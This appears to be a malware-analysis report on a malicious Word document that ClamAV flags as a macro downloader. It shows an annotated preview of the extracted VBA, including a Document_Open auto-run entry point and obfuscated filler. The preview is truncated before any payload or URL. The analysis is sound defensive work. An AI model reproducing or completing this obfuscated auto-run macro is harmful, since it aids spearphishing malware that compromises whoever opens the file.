MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with a critical heuristic firing for a downloader macro. The presence of a Document_Open macro and embedded VBA code strongly suggests an attempt to execute malicious code upon opening. While the VBA code is obfuscated, the Document_Open subroutine is a common entry point for macro-based malware, likely to download and execute a secondary payload.
Heuristics 4
-
ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION — ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROS — Document contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPEN — Document_Open macro
-
Embedded URL info EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
- http://ns.adobe.com/xap/1.0/ — In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/ — In document text (OLE body)
- http://purl.org/dc/elements/1.1/ — In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/ — In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef# — In document text (OLE body)
All seven are standard XMP, RDF and Dublin Core namespace identifiers of the kind carried in embedded image metadata; every one is labelled as reached from the document body, none from the macro code shown below.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: ab6535436e238bc6c375249fad96a3bd5f75271622e44f6918007316e0f2a0e4) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14264 bytes |
Preview script — first 1,000 lines of the extracted script
' Module header as emitted by the olevba export: this is the document's ThisDocument
' class module (VB_Name), derived from the Normal template (VB_Base / VB_TemplateDerived).
' ThisDocument is where Word's Document_Open event handler lives, which is why the
' handler below runs automatically when the document is opened.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-run entry point: Word executes Document_Open when the document is opened, which is
' what the OLE_VBA_DOCOPEN heuristic flags. Nothing here touches document content; the
' actual work is delegated to nundinate().
Private Sub Document_Open()
' Declared-but-unused locals and throwaway string assignments: filler with no effect on control flow.
Dim fertilizable As Long
Dim apodal As String
chipewyan = "elanoides"
transgfress = "crokscrew"
' The only statement with an observable effect: calls the nundinate procedure defined later in this module.
nundinate
' affinity = 40. Pmt is VBA's built-in financial function; its return value is discarded,
' so this pair is junk code. The same Pmt pattern recurs in every routine of the module.
affinity = 37 + 3
Pmt 0, affinity, 11989, 48916, 2
End Sub
' Not called from any code visible in this excerpt. It reads an Access table (tblContacts)
' through ADODB and writes one letter per contact into a new Word document -- the shape of a
' stock Access/Word mail-merge sample, so it presumably was pasted in as benign-looking
' padding; confirm against the truncated remainder of the module before treating it as dead code.
Sub ControlWord()
Dim objWord As New Word.Application
Dim rsContacts As New ADODB.Recordset
Dim strLtrContent As String
' CurrentProject belongs to the Access object model; hosted in a Word document this line
' would presumably fail at runtime -- confirm.
rsContacts.ActiveConnection = CurrentProject.Connection
rsContacts.Open "tblContacts"
objWord.Documents.Add
' One name / address / salutation block per record, each followed by a page break.
Do While Not rsContacts.EOF
strLtrContent = rsContacts("FirstName") & " " & rsContacts("LastName")
strLtrContent = strLtrContent & rsContacts("Address") & vbCrLf
strLtrContent = strLtrContent & rsContacts("City") & ", " & rsContacts("Region")
strLtrContent = strLtrContent & " " & rsContacts("PostalCode")
strLtrContent = strLtrContent & "Dear " & rsContacts("FirstName") & " "
strLtrContent = strLtrContent & rsContacts("LastName") & ":"
objWord.Selection.EndOf
objWord.Selection.Text = strLtrContent
objWord.Selection.EndOf
objWord.Selection.InsertBreak
rsContacts.MoveNext
Loop
' Shows the generated document and switches it to print preview.
objWord.Visible = True
objWord.PrintPreview = True
End Sub
' Forwarding wrapper: copies its three arguments into LongPtr locals and passes them, together
' with a literal -1 and the never-assigned `hopeless`, to `amassed`. `amassed` is not defined in
' the visible excerpt (presumably a Declare'd API or a procedure in the truncated tail -- confirm).
' Returns nothing: the function name is never assigned.
Function dumbbell(amboyna, nonrestrictive, sapporo)
Dim erection As Integer
Dim superintendent As Long
Dim nice As LongPtr
Dim barrette As LongPtr
Dim hopeless As LongPtr
Dim flown As String
Dim veniam As LongPtr
Dim enigmatic As LongPtr
' Filler: undeclared names set to constants.
cwater = Fix(254)
bachelorship = Fix(317)
' Real data flow: the parameters are staged into the locals used by the amassed call.
barrette = amboyna
enigmatic = sapporo
' Self-assignment: no effect.
queens = queens
veniam = nonrestrictive
' Discarded Pmt result and an unused string literal: more filler.
retentive = 4 + 36
Pmt 0, retentive, 23764, 51779, 2
perturb = "apostrophe"
' nice = 128 - 62 - 67 = -1, passed ByVal as the first argument below.
nice = 128 - 62 - 67
' Single call split over line continuations; hopeless is uninitialised at this point
' (possibly an output argument -- confirm against the definition of amassed).
amassed ByVal nice, _
barrette, _
veniam, enigmatic, _
hopeless
' Discarded random value: no effect.
bachelorship = Rnd(453)
End Function
' Same shape as dumbbell: forwards its three arguments to `amassed`, with the first argument
' again computed as -1 (109 - 40 - 70) and the never-assigned `goldfields` in the fifth
' position. `amassed` is not defined in the visible excerpt. Returns nothing: the function
' name is never assigned.
Function innovation(biographer, footloose, legitimateness)
Dim newport As Long
Dim unbeauteous As Long
Dim chirpiness As Long
Dim unquenchable As Integer
Dim uncopied As Long
Dim appetitive As Byte
Dim goldfields As Long
Dim poronotus As Variant
Dim emulation As Long
Dim moneymaker As Variant
Dim offbroadway As Long
' Filler: rounding/truncation of constants, unused string literal, discarded Pmt result.
bachelorship = Math.Round(461)
selfenclosed = "berberis"
' Real data flow: parameters staged into the locals passed to amassed.
newport = biographer
emulation = legitimateness
bachelorship = Fix(233)
uncopied = footloose
podilymbus = 36 + 6
Pmt 0, podilymbus, 19222, 14937, 4
' weasand is never assigned anywhere in the excerpt.
perturb = weasand
' chirpiness = -1, passed ByVal as the first argument.
chirpiness = 109 - 40 - 70
amassed ByVal chirpiness, newport, uncopied, emulation, goldfields
' cwater is neither declared nor assigned in this function (dumbbell sets its own undeclared
' name of the same spelling); unless it is a module or global variable elsewhere it is an
' empty Variant here. The result is discarded either way.
bachelorship = cwater \ 280
End Function
Sub nundinate()
Dim hounds As String
Dim august As Integer
masticophis.ignavus.Value = Day(#12/5/2013#)
varday = cozen = "iledefrance"
fade = "postganglionic"
geoffroea = "falco"
shrewish = "oscillogram"
twenties = "clew"
saxicola = "heliograph"
fluidity = "heritage"
Set berth = masticophis.ignavus.SelectedItem
reservedly = 51 + 23
Pmt 0, reservedly, 14147, 32592, 7
mangosteen = berth.Name
clammily = 118 - 97 + 7823
safe = Right(mangosteen, clammily)
developed = bestiality.scrannel(safe)
caligation = 34 + 21
Pmt 0, caligation, 8110, 40852, 7
pardonner = "specialize"
#If (46 - 39 + 393 + 12 - 69 + 357) > ((122 - 110 + 308) - (126 - 97 + 511) * 1) And ((66 - 92 + 54) - (39 - 33 + 22)) * 2 < (Win64) Then
Dim deepread As Byte
Dim argil As LongPtr
Dim aperit As LongPtr
Dim suppliant As Byte
#ElseIf (4 - 50 + 446 + 38 - 119 + 381) > ((3 - 100 + 417) - (24 - 41 + 557) * 1) And Not ((83 - 12 - 43) - (29 - 43 + 42)) * 2 < (Win64) Then
Dim serrulate As Variant
Dim aperit As Long
Dim amygdalus As Variant
Dim argil As Long
#End If
pomoxis = 39 - 105 + 66
naranjilla = "allodial"
circumfuse = 48 - 126 + 4174
qs = 7 + 55
Pmt 0, qs, 29858, 26034, 5
foul = conditionally
comprise = "harsh"
patten = boletellus
nonruminant
... (truncated)